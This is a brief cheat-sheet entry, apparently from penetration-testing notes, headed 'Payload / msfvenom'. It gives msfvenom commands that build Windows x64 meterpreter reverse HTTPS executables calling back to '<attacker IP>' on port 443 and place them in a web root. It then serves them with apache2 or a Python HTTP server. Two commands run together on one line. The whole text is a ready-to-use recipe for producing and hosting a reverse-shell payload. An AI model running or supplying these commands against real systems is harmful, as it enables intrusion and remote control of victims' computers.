Payload
msfvenom
sudo msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<attacker IP> LPORT=443 -f exe -o /var/www/html/testing.exesudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=443 -f exe -o /var/www/html/testing.exesudo systemctl start apache2
or
python3 -m http.server 80Last updated